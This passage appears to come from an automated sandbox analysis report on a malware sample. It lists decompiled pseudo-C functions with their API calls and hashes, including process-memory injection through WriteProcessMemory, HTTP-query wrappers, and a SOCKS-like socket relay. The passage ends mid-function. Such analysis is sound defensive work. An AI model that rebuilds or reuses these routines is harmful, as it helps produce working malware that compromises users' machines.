        • String ID: eyboardState
        • API String ID: 2978645861-1210060208
        • Opcode ID: c1ba86e4b26f79498f9fca64e0e42451e1ac2618acdc34fef0ab4b50732e4421
        • Instruction ID: 2a55c66f3d65fc5c79ef22dd4f6eb8a3ad874ab2d4eea9cee1a78fb2f516a635
        • Opcode Fuzzy Hash: c1ba86e4b26f79498f9fca64e0e42451e1ac2618acdc34fef0ab4b50732e4421
        • Instruction Fuzzy Hash: CE11A0326602418ADB24BF65A844AA63365BFC3384B11C03ED802A3B93D7398C06CA1C
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040E27A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28networkCOMMON
        Download Yara Rule
        C-Code - Quality: 37%
        			E0040E27A(void* __eflags, void* _a4, long _a8, void* _a12, DWORD* _a16, DWORD* _a20) {
				void* __esi;
				signed int _t10;
				signed char* _t14;
				void* _t16;

				 *0x414ed8(0x414f68);
				_t16 = _a4;
				_t10 = E0040CC82(_t16);
				if(_t10 != 0xffffffff) {
					_t14 = _t10 * 0x30 +  *0x414f5c;
					if(( *_t14 & 0x00000002) != 0) {
						_t16 = _t14[0x10];
					}
				}
				 *0x414edc(0x414f68);
				return HttpQueryInfoW(_t16, _a8, _a12, _a16, _a20);
			}







        0x0040e285
        0x0040e28b
        0x0040e28e
        0x0040e296
        0x0040e29b
        0x0040e2a4
        0x0040e2a6
        0x0040e2a6
        0x0040e2a4
        0x0040e2aa
        0x0040e2c6

        APIs
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040E285
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040E2AA
        • HttpQueryInfoW.WININET(?,?,?,?,?), ref: 0040E2BD
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterHttpInfoLeaveQuery
        • String ID: essAsUserA
        • API String ID: 2599332303-2345198579
        • Opcode ID: 1a97d6165e0f29229ac535f3233df5f361eef297dfa11066912a4c712b7368c0
        • Instruction ID: e1cfe148458a0d374463c706ffc50a9df2aa78aa2618f79567a0d121f6ee821f
        • Opcode Fuzzy Hash: 1a97d6165e0f29229ac535f3233df5f361eef297dfa11066912a4c712b7368c0
        • Instruction Fuzzy Hash: BBF01233100104ABCB015FA6EC099DA7B69FFC5361B098166F915962B1C33599629B69
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040E22B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28networkCOMMON
        Download Yara Rule
        C-Code - Quality: 37%
        			E0040E22B(void* __eflags, void* _a4, long _a8, void* _a12, DWORD* _a16, DWORD* _a20) {
				void* __esi;
				signed int _t10;
				signed char* _t14;
				void* _t16;

				 *0x414ed8(0x414f68);
				_t16 = _a4;
				_t10 = E0040CC82(_t16);
				if(_t10 != 0xffffffff) {
					_t14 = _t10 * 0x30 +  *0x414f5c;
					if(( *_t14 & 0x00000002) != 0) {
						_t16 = _t14[0x10];
					}
				}
				 *0x414edc(0x414f68);
				return HttpQueryInfoA(_t16, _a8, _a12, _a16, _a20);
			}







        0x0040e236
        0x0040e23c
        0x0040e23f
        0x0040e247
        0x0040e24c
        0x0040e255
        0x0040e257
        0x0040e257
        0x0040e255
        0x0040e25b
        0x0040e277

        APIs
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040E236
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040E25B
        • HttpQueryInfoA.WININET(?,?,?,?,?), ref: 0040E26E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterHttpInfoLeaveQuery
        • String ID: essAsUserA
        • API String ID: 2599332303-2345198579
        • Opcode ID: 86fff00f82a0ffbb8b21c32addcd37bad75e3b6023b0ca0874c9157a66663bc0
        • Instruction ID: bd02915647fc206e326d4eaad0ff4dcf230bea2d50ec102752914874facdcd48
        • Opcode Fuzzy Hash: 86fff00f82a0ffbb8b21c32addcd37bad75e3b6023b0ca0874c9157a66663bc0
        • Instruction Fuzzy Hash: 41F0A733000104ABCB015FA5DC099DB7F28FFC9321B098176F914972B1C3349832DB68
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040E6A4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21networkCOMMON
        Download Yara Rule
        C-Code - Quality: 50%
        			E0040E6A4(void* __eflags, void* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t2;
				int _t8;

				_t2 = InternetCloseHandle(_a4);
				_t8 = _t2;
				 *0x414ed8(0x414f68);
				if(E0040CC82(_a4) != 0xffffffff) {
					E0040CD37(_t4, _t8, 0x414f68);
				}
				 *0x414edc(0x414f68);
				return _t8;
			}








        0x0040e6ac
        0x0040e6b8
        0x0040e6ba
        0x0040e6c8
        0x0040e6ca
        0x0040e6ca
        0x0040e6d0
        0x0040e6db

        APIs
        • InternetCloseHandle.WININET(?), ref: 0040E6AC
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040E6BA
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040E6D0
          • Part of subcall function 0040CD37: WaitForSingleObject.KERNEL32(?,000000FF,?,0040E692), ref: 0040CD4D
          • Part of subcall function 0040CD37: CloseHandle.KERNEL32(?), ref: 0040CD56
          • Part of subcall function 0040CD37: InternetCloseHandle.WININET(?), ref: 0040CDBA
          • Part of subcall function 0040CD37: InternetCloseHandle.WININET(?), ref: 0040CDC3
          • Part of subcall function 0040CD37: InternetCloseHandle.WININET(?), ref: 0040CDCC
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseHandle$Internet$CriticalSection$EnterLeaveObjectSingleWait
        • String ID: essAsUserA
        • API String ID: 406405894-2345198579
        • Opcode ID: 4fbd01fb2de23321b2e1d399cb468b9ba5e2ad3d7f072ecbb801c77c43b1d9b2
        • Instruction ID: 6fd894409a7797765e1f1435790fae2223cc2f8b41334393aa0ac875738e4314
        • Opcode Fuzzy Hash: 4fbd01fb2de23321b2e1d399cb468b9ba5e2ad3d7f072ecbb801c77c43b1d9b2
        • Instruction Fuzzy Hash: BCD0C232211200AB860027BAAC8C8DF67ACEED9335305863BF124E22A0C7784822867D
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00413832, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7stringCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00413832(WCHAR* _a4) {

				lstrcpyW(_a4, "yNameW");
				return lstrcatW(_a4, L".lll");
			}



        0x0041383b
        0x00413850

        APIs
        • lstrcpyW.KERNEL32(00413B91,yNameW), ref: 0041383B
        • lstrcatW.KERNEL32(?,.lll), ref: 0041384A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: lstrcatlstrcpy
        • String ID: .lll$yNameW
        • API String ID: 3905823039-2544435849
        • Opcode ID: e504c53ac1583ee800af99c6a5756783ab88ad92864f25176c8e4d7bbd0cff0e
        • Instruction ID: 30c8a07d45c3d761b3fe51e35429364440b2484357cbb89942221be5d872d93e
        • Opcode Fuzzy Hash: e504c53ac1583ee800af99c6a5756783ab88ad92864f25176c8e4d7bbd0cff0e
        • Instruction Fuzzy Hash: A7C04C71184201AFCA015B50EC09989BE71ABF0B43F11C436B245900B0C77544A1DA09
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00412956, Relevance: 6.1, APIs: 4, Instructions: 80fileCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00412956(signed int __edx, long __edi, void** __esi, void* _a4) {
				char _v5;
				long _v12;
				void _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t22;
				signed int _t25;
				signed int _t41;
				void** _t43;

				_t43 = __esi;
				_t41 = __edx;
				_v5 = 0;
				if(__edi <= 0xa00000) {
					_t22 = E00410063( *__esi);
					_v36 = _t22;
					_v32 = _t41;
					if((_t22 & _t41) != 0xffffffff && E00410043( *__esi, 0, 0, 2) != 0) {
						_t25 = E00410063( *__esi);
						_v28 = _t25;
						_v24 = _t41;
						if((_t25 & _t41) != 0xffffffff) {
							E0040F21C( &_v20,  &_v20, 0, 5);
							_v20 = __esi[4] ^ __edi;
							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, __edi,  &_v12, 0) == 0 || _v12 != __edi) {
								E00410043( *_t43, _v28, _v24, 0);
								SetEndOfFile( *_t43);
							} else {
								_v5 = 1;
							}
						}
						FlushFileBuffers( *_t43);
						E00410043( *_t43, _v36, _v32, 0);
					}
				}
				return _v5;
			}














        0x00412956
        0x00412956
        0x0041295f
        0x00412968
        0x00412970
        0x00412975
        0x0041297a
        0x00412980
        0x0041299b
        0x004129a0
        0x004129a5
        0x004129ab
        0x004129b4
        0x004129bf
        0x004129d6
        0x00412a07
        0x00412a0e
        0x004129f8
        0x004129f8
        0x004129f8
        0x004129d6
        0x00412a16
        0x00412a25
        0x00412a25
        0x00412980
        0x00412a2f

        APIs
          • Part of subcall function 00410063: SetFilePointerEx.KERNEL32(?,00000000,00000000,u)A,00000001,00412975,?,00000000,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 00410078
          • Part of subcall function 00410043: SetFilePointerEx.KERNEL32(00000004,00000004,00000004,00000000,00000002,0041292C,?,00000000,00000000,00000000), ref: 00410055
        • WriteFile.KERNEL32(?,00000000,00000005,00000000,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000), ref: 004129CE
        • WriteFile.KERNEL32(?,00000005,00000000,00000005,00000000,?,?,?,00000008,00000000,00000000), ref: 004129E9
        • SetEndOfFile.KERNEL32(?,?,?,00000008,00000000,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 00412A0E
        • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 00412A16
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$PointerWrite$BuffersFlush
        • String ID:
        • API String ID: 1289656144-0
        • Opcode ID: 0410af7415e18902b7641383dffa6b16a4c38976019bf45448432ff81f913123
        • Instruction ID: 7d9063c9432b0f35d0ceee1fb0850a0c130c69ec221d5fbb5670dbb1b19890f8
        • Opcode Fuzzy Hash: 0410af7415e18902b7641383dffa6b16a4c38976019bf45448432ff81f913123
        • Instruction Fuzzy Hash: 7C215C75900108EEDB229FE5CC45EEEBFB9FF08344F14852AA190E1161D3BA49A09B68
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004107B3, Relevance: 6.1, APIs: 4, Instructions: 68networksynchronizationCOMMON
        Download Yara Rule
        APIs
        • WaitForSingleObject.KERNEL32(0100007F,00000000), ref: 004107D2
        • recv.WS2_32(?,?,00000400,00000000), ref: 00410816
        • send.WS2_32(?,?,00000000,00000000), ref: 0041082F
        • select.WS2_32(00000000,?,00000000,00000000,?), ref: 0041086E
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ObjectSingleWaitrecvselectsend
        • String ID:
        • API String ID: 4176622587-0
        • Opcode ID: b2b99abd63bd245c33259fc579fcdac4b169c929715f5ac23924078959346934
        • Instruction ID: 5da3498e9c4697c8d5e461f6b9d3581162d7ed19e7fc07f408b93d1e65d4cb48
        • Opcode Fuzzy Hash: b2b99abd63bd245c33259fc579fcdac4b169c929715f5ac23924078959346934
        • Instruction Fuzzy Hash: 1E213A71A013289FDB20AF65DC84AEE7BA8FF45354F200056F959D2241D7B499C0CFE5
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405D92, Relevance: 6.1, APIs: 4, Instructions: 63fileCOMMON
        Download Yara Rule
        C-Code - Quality: 68%
        			E00405D92(void* __ecx, void* __edx, void* _a4, WCHAR* _a8, WCHAR* _a12) {
				char _v5;
				long _v12;
				long _v16;
				short _v536;
				long _t23;
				int _t26;
				signed int _t27;
				void* _t36;
				void* _t37;
				void* _t39;

				_t37 = __edx;
				_t36 = __ecx;
				_push( &_v16);
				_push(_a4);
				_v5 = 0;
				if( *0x414d7c() != 0 && _v12 == 0) {
					_t23 = _v16;
					if(_t23 < 0xa000 && _t23 != 0) {
						_t39 = E0040F14B(_t23);
						if(_t39 != 0) {
							_t26 = ReadFile(_a4, _t39, _v16,  &_v12, 0);
							_t27 = _v12;
							if(_t26 != 0 && _v16 == _t27) {
								PathCombineW( &_v536, _a8, _a12);
								_v5 = E0041341D(_t36, _t37, 3, 0,  &_v536, _t39, _v16);
								_t27 = _v12;
							}
							SetFilePointer(_a4,  ~_t27, 0, 1);
							E0040F15E(_t39);
						}
					}
				}
				return _v5;
			}













        0x00405d92
        0x00405d92
        0x00405d9f
        0x00405da0
        0x00405da5
        0x00405db0
        0x00405db7
        0x00405dbf
        0x00405dcb
        0x00405dcf
        0x00405ddd
        0x00405de5
        0x00405de8
        0x00405dfc
        0x00405e15
        0x00405e18
        0x00405e18
        0x00405e24
        0x00405e2b
        0x00405e2b
        0x00405e30
        0x00405dbf
        0x00405e36

        APIs
        • GetFileSizeEx.KERNEL32(?,?), ref: 00405DA8
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405DDD
        • PathCombineW.SHLWAPI(?,?,?), ref: 00405DFC
        • SetFilePointer.KERNEL32(?,?,00000000,00000001), ref: 00405E24
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$AllocateCombineHeapPathPointerReadSize
        • String ID:
        • API String ID: 3944749492-0
        • Opcode ID: cdab1856a7056c01ec423a48bb323aa3cefe5f692b76461e504a812bed7a14ac
        • Instruction ID: 5ea8a33f54c502a4fc313eb19a6338acf88e11f9fd1a129df9a0f8319ac9f1ba
        • Opcode Fuzzy Hash: cdab1856a7056c01ec423a48bb323aa3cefe5f692b76461e504a812bed7a14ac
        • Instruction Fuzzy Hash: E5113A72900109BFDF21AFE4DC88AEF7B7DEB15304F00807AF558A6150D2359B45CBA9
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00407811, Relevance: 6.1, APIs: 4, Instructions: 51injectionCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00407811(void* __edi, void* _a4) {
				long _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				int _t22;
				void* _t24;

				_t24 =  *0x414ad0; // 0xffffffff
				_t22 = 0;
				if(VirtualQueryEx(_t24, __edi,  &_v36, 0x1c) != 0 && _v36.Protect != 1 && (_v36.Protect & 0x00000100) == 0 && _v36.RegionSize != 0 && VirtualProtectEx(_t24, __edi, 4, 0x40,  &_v8) != 0) {
					_t22 = WriteProcessMemory(_t24, __edi, _a4, 4, 0);
					VirtualProtectEx(_t24, __edi, 4, _v8,  &_v8);
				}
				return 0 | _t22 != 0x00000000;
			}







        0x00407819
        0x00407827
        0x00407831
        0x00407869
        0x00407876
        0x00407876
        0x00407886

        APIs
        • VirtualQueryEx.KERNEL32(FFFFFFFF,?,?,0000001C,004144E0,00000000), ref: 00407829
        • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000004,00000040,00000000), ref: 00407851
        • WriteProcessMemory.KERNEL32(FFFFFFFF,?,?,00000004,00000000), ref: 00407863
        • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000004,00000000,00000000), ref: 00407876
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Virtual$Protect$MemoryProcessQueryWrite
        • String ID:
        • API String ID: 2789181485-0
        • Opcode ID: 849783bcbac01ca5da68d7cf0477a5dc528606e22a1a13f3ba11af2f66c2b57d
        • Instruction ID: 02b6077ffb0b45d70974ca2db4d7824bc1cdafff8271ca8a03a4685634a2ab63
        • Opcode Fuzzy Hash: 849783bcbac01ca5da68d7cf0477a5dc528606e22a1a13f3ba11af2f66c2b57d
        • Instruction Fuzzy Hash: AF015272940209BBEB119B929C49FEF767CFB49754F048035BB01A6180D7B8DA40CBB9
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00411395, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 211COMMON
        Download Yara Rule
        C-Code - Quality: 71%
        			E00411395(char _a4) {
				char _v9;
				char _v13;
				char _v20;
				unsigned int _v25;
				short _v27;
				signed char _v28;
				unsigned int _v40;
				short _v42;
				char _v44;
				char _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t57;
				short _t72;
				void* _t74;
				void* _t77;
				void* _t78;
				void* _t88;
				char _t90;
				char _t97;
				char _t106;
				char _t122;
				char _t125;
				void* _t128;
				intOrPtr _t129;
				void* _t130;

				_t106 = 0;
				_push(0);
				_push( &_v28);
				_push(_a4);
				_t57 = 7;
				if(E00410611(_t57) != 0) {
					while(E00410611(1, _a4,  &_v9, _t106) != 0) {
						if(_v9 == _t106) {
							_t109 = _v25;
							_v13 = 0x5a;
							if(((_v25 & 0x00ff0000 | _v25 >> 0x00000010) >> 0x00000008 | (_t109 & 0x0000ff00 | _t109 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
								L21:
								_v9 = 1;
								if(_v13 != 0x5a) {
									L46:
									return E0041131F(_a4, 0xffffffff, _v13, _t106) & 0xffffff00 | _t68 != 0x00000000;
								}
								E0040F21C( &_v44,  &_v44, _t106, 0x10);
								_t72 = 2;
								_v44 = _t72;
								_t74 = (_v28 & 0x000000ff) - 1;
								if(_t74 == 0) {
									_v42 = _v27;
									_v40 = _v25;
									_t77 = E00410692( &_v44, 0x10);
									_t124 = _t77;
									if(_t77 == 0xffffffff) {
										L24:
										_v13 = 0x5b;
										goto L46;
									}
									_t78 = E0041131F(_a4, _t124, 0x5a, _t106);
									if(_t78 != 1) {
										if(_t78 != 0xffffffff) {
											_v9 = _t106;
										} else {
											_v13 = 0x5b;
										}
									} else {
										E0041070D(_t124, _a4);
										_t106 = 0;
									}
									E00410970(_t124);
									if(_v9 != 1 || _v13 == 0x5a) {
										L36:
										return _v9;
									} else {
										goto L46;
									}
								}
								if(_t74 == 1) {
									_t125 = E004106C8( &_v44, 0x10, 1);
									_v20 = _t125;
									if(_t125 == 0xffffffff) {
										goto L24;
									}
									_t122 = E0041131F(_a4, _t125, 0x5a, _t106);
									if(_t122 != 1) {
										E00410970(_t125);
										L33:
										if(_t122 == 0xffffffff) {
											goto L24;
										}
										if(_t122 != 1) {
											_v9 = 0;
										}
										goto L36;
									}
									_t88 = E0041094B( &_v20,  &_a4);
									_t108 = _t88;
									E00410970(_v20);
									if(_t88 != 0xffffffff) {
										_t123 = _a4;
										_t90 = E0041131F(_a4, _t108, 0x5a, 2);
										_v20 = _t90;
										if(_t90 == 1) {
											E0041070D(_t108, _t123);
										}
										E00410970(_t108);
										_t122 = _v20;
										_t106 = 0;
										goto L33;
									}
									_v13 = 0x5b;
									_t106 = 0;
									goto L46;
								}
								goto L24;
							}
							_t128 = 0;
							while(E00410611(1, _a4,  &_v9, _t106) != 0) {
								_t97 = _v9;
								 *((char*)(_t130 + _t128 - 0x12c)) = _t97;
								if(_t97 == 0) {
									_push( &_v20);
									_push(_t106);
									_push(_t106);
									_push( &_v304);
									_v20 = _t106;
									if( *0x414ce0() == 0) {
										_t129 = _v20;
										while(_t129 != _t106) {
											if( *((intOrPtr*)(_t129 + 4)) == 2) {
												E0040F19A( &_v25,  *((intOrPtr*)(_t129 + 0x18)) + 4, 4);
												L20:
												 *0x414ce4(_v20);
												if(_t129 == _t106) {
													goto L13;
												}
												goto L21;
											}
											_t129 =  *((intOrPtr*)(_t129 + 0x1c));
										}
										goto L20;
									}
									L13:
									_v13 = 0x5b;
									goto L21;
								}
								_t128 = _t128 + 1;
								if(_t128 <= 0xff) {
									continue;
								}
								goto L1;
							}
							goto L1;
						}
					}
				}
				L1:
				return 0;
			}






























        0x004113a1
        0x004113a3
        0x004113a7
        0x004113a8
        0x004113ad
        0x004113b5
        0x004113c8
        0x004113c6
        0x004113dd
        0x00411404
        0x0041140d
        0x00411497
        0x0041149b
        0x0041149f
        0x004115c9
        0x00000000
        0x004115d9
        0x004114ac
        0x004114b3
        0x004114b4
        0x004114bc
        0x004114bd
        0x0041156c
        0x00411578
        0x0041157b
        0x00411580
        0x00411585
        0x004114c6
        0x004114c6
        0x00000000
        0x004114c6
        0x00411592
        0x0041159a
        0x004115ad
        0x004115b5
        0x004115af
        0x004115af
        0x004115af
        0x0041159c
        0x004115a1
        0x004115a6
        0x004115a6
        0x004115b8
        0x004115c1
        0x0041155e
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x004115c1
        0x004114c4
        0x004114da
        0x004114dc
        0x004114e2
        0x00000000
        0x00000000
        0x004114f0
        0x004114f5
        0x00411547
        0x0041154c
        0x0041154f
        0x00000000
        0x00000000
        0x00411558
        0x0041155a
        0x0041155a
        0x00000000
        0x00411558
        0x004114ff
        0x00411507
        0x00411509
        0x00411511
        0x0041151e
        0x00411527
        0x0041152c
        0x00411532
        0x00411534
        0x00411534
        0x0041153b
        0x00411540
        0x00411543
        0x00000000
        0x00411543
        0x00411513
        0x00411517
        0x00000000
        0x00411517
        0x00000000
        0x004114c4
        0x00411413
        0x00411415
        0x00411428
        0x0041142b
        0x00411434
        0x00411447
        0x00411448
        0x00411449
        0x00411450
        0x00411451
        0x0041145c
        0x00411464
        0x00411472
        0x0041146d
        0x00411485
        0x0041148a
        0x0041148d
        0x00411495
        0x00000000
        0x00000000
        0x00000000
        0x00411495
        0x0041146f
        0x0041146f
        0x00000000
        0x00411476
        0x0041145e
        0x0041145e
        0x00000000
        0x0041145e
        0x00411436
        0x0041143d
        0x00000000
        0x00000000
        0x00000000
        0x0041143f
        0x00000000
        0x00411415
        0x004113c6
        0x004113db
        0x004113b7
        0x00000000

        APIs
        • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00411454
        • FreeAddrInfoW.WS2_32(?), ref: 0041148D
          • Part of subcall function 0041131F: getpeername.WS2_32(000000FF,00000000,00000000), ref: 00411343
          • Part of subcall function 0041070D: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 0041079E
          • Part of subcall function 00410970: shutdown.WS2_32(?,00000002), ref: 00410978
          • Part of subcall function 00410970: closesocket.WS2_32(?), ref: 0041097F
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddrFreeInfoclosesocketgetaddrinfogetpeernameselectshutdown
        • String ID: Z
        • API String ID: 263972530-1505515367
        • Opcode ID: cd0bcc34bcf69663638493a94630cb5be7607553fd9e9f9a94d3c1edddfc715e
        • Instruction ID: 07eb7bd059e1cc88c34163b49e316a6eaea666dc4a98b61477b534f9a831ed89
        • Opcode Fuzzy Hash: cd0bcc34bcf69663638493a94630cb5be7607553fd9e9f9a94d3c1edddfc715e
        • Instruction Fuzzy Hash: 0F615C31900258BADF109BA48C41BFF7B6A9B41354F044667FB51B72E1D3BC89C5879D
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004080E4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON
        Download Yara Rule
        C-Code - Quality: 97%
        			E004080E4(short _a4, signed int _a8, char* _a16, int _a20) {
				char _v5;
				WCHAR* _v12;
				intOrPtr _v40;
				intOrPtr _v48;
				char _v56;
				short _v576;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t39;
				signed char _t41;
				char _t43;
				void* _t45;
				WCHAR _t48;
				void* _t50;
				short* _t51;
				long _t53;
				signed int _t65;
				short _t71;
				short _t72;
				int _t74;
				WCHAR* _t76;

				_v5 = 0;
				if(_a4 == 0x45 || _a4 == 0x46) {
					E0040B0A0( &_v576);
					_t65 = E0040F649( &_v576) + 1;
					E00412C5E( &_v56);
					_v40 =  *_a8;
					_t39 =  *0x414a30; // 0x2210041
					_v48 = _t39;
					_v12 =  &_v576;
					_t41 = E0040FD42(_t65,  &_v56, __eflags, 0);
					asm("sbb al, al");
					_t43 =  ~_t41 + 1;
					__eflags = _t43;
					_v5 = _t43;
				} else {
					_t65 = ExpandEnvironmentStringsW(E0040F5EA(_a8 | 0xffffffff,  *_a8),  &_v576, 0x104);
					E0040F15E(_t60);
					_t43 = _v5;
				}
				if(_t65 != 0 && _t43 == 0) {
					_t74 = _a20;
					_t45 = _t65 + _t74;
					_t46 = _t45 + _t45 + 0x14;
					if(_t45 + _t45 + 0x14 != 0) {
						_t76 = E0040F14B(_t46);
					} else {
						_t76 = 0;
					}
					_t48 = 0x22;
					 *_t76 = _t48;
					_t22 = _t76 + 2; // 0x2
					_t50 = E0040F19A(_t22,  &_v576, _t65 + _t65);
					_t51 = _t50 + _t76;
					_t71 = 0x22;
					 *_t51 = _t71;
					if(_t74 != 0) {
						_t72 = 0x20;
						 *((short*)(_t51 + 2)) = _t72;
						_t25 = _t65 * 2; // 0x4
						MultiByteToWideChar(0, 0, _a16, _t74, _t76 + _t25 + 4, _t74);
					}
					if(_a4 == 0x45 || _a4 == 0x47) {
						_t53 = 1;
						__eflags = 1;
					} else {
						_t53 = 0;
					}
					E0040B4C6(_t53, 0, _t76);
					E0040F15E(_t76);
					_t43 = _v5;
				}
				return 0 | _t43 == 0x00000000;
			}

























        0x004080f5
        0x004080f9
        0x00408138
        0x0040814d
        0x0040814e
        0x00408158
        0x0040815b
        0x00408160
        0x0040816d
        0x00408170
        0x00408177
        0x00408179
        0x00408179
        0x0040817b
        0x00408102
        0x00408125
        0x00408127
        0x0040812c
        0x0040812c
        0x00408180
        0x0040818e
        0x00408191
        0x00408194
        0x0040819a
        0x004081a5
        0x0040819c
        0x0040819c
        0x0040819c
        0x004081a9
        0x004081aa
        0x004081b8
        0x004081bc
        0x004081c3
        0x004081c5
        0x004081c6
        0x004081cb
        0x004081cf
        0x004081d1
        0x004081d5
        0x004081e2
        0x004081e2
        0x004081ed
        0x004081fc
        0x004081fc
        0x004081f6
        0x004081f6
        0x004081f6
        0x00408201
        0x00408207
        0x0040820c
        0x0040820c
        0x0040821c

        APIs
        • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?), ref: 0040811E
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000004,?,00000002,?,00000022,00000000,?), ref: 004081E2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ByteCharEnvironmentExpandFreeHeapMultiStringsWide
        • String ID: G
        • API String ID: 4193686461-985283518
        • Opcode ID: 2ffd9b5a7fdc152816094f60092de8c8a1bc0c4fa8a4b47da8b774bad1c851c6
        • Instruction ID: 20455b3fcdfb5c6a1f557837f0cae914d81b8590bf2400cb6b3d12f3d9bfebe7
        • Opcode Fuzzy Hash: 2ffd9b5a7fdc152816094f60092de8c8a1bc0c4fa8a4b47da8b774bad1c851c6
        • Instruction Fuzzy Hash: 8631E631500208AACB21AFA4CD45BDA77B8DF05704F10807FF555BB2D2EB7C9A4AC798
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00407A50, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
        Download Yara Rule
        C-Code - Quality: 50%
        			E00407A50(void* __eax, void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* __edi;
				void* _t35;
				void* _t36;
				int _t38;
				int _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				void* _t50;
				void* _t53;
				void* _t56;
				signed int _t60;
				void* _t62;
				intOrPtr* _t64;

				_t56 = __edx;
				_t55 = __ecx;
				_t35 = __eax;
				_push(__ecx);
				_push(__ecx);
				_t53 = 0;
				_v12 = 0;
				_t64 = __eax;
				while( *((intOrPtr*)(_t64 + 8)) != 0) {
					_t36 = _t53;
					while(1) {
						_t35 = E00407889(_t36, _a4,  *_t64);
						_t53 = _t35;
						if(_t53 == 0) {
							break;
						}
						_t3 = _t64 + 8; // 0x4142c0
						_t60 = 0;
						_v8 = 0;
						if( *((intOrPtr*)( *_t3 + 8)) != 0) {
							do {
								_t38 = IsBadHugeReadPtr(_t53, 4);
								if(_t38 != 0 ||  *_t53 == _t38) {
									_t15 = _t64 + 8; // 0x4142c0
									if( *((intOrPtr*)(_t60 +  *_t15 + 0xc)) != 0) {
										_t18 = _t53 + 0x10; // 0x10
										_t42 = IsBadHugeReadPtr(_t18, 4);
										if(_t42 == 0 &&  *(_t53 + 0x10) != _t42) {
											_t20 = _t64 + 8; // 0x4142c0
											_t62 = _t60 +  *_t20;
											_push( *((intOrPtr*)(_t62 + 8)));
											_push(2);
											_push( *((intOrPtr*)( *((intOrPtr*)(_t62 + 0xc)))));
											goto L14;
										}
									}
								} else {
									_t6 = _t64 + 8; // 0x4142c0
									_t46 =  *_t6;
									if( *((intOrPtr*)(_t60 + _t46 + 4)) == 0) {
										L8:
										_t12 = _t64 + 8; // 0x4142c0
										_t47 =  *_t12;
										if( *((short*)(_t60 + _t47)) != 0) {
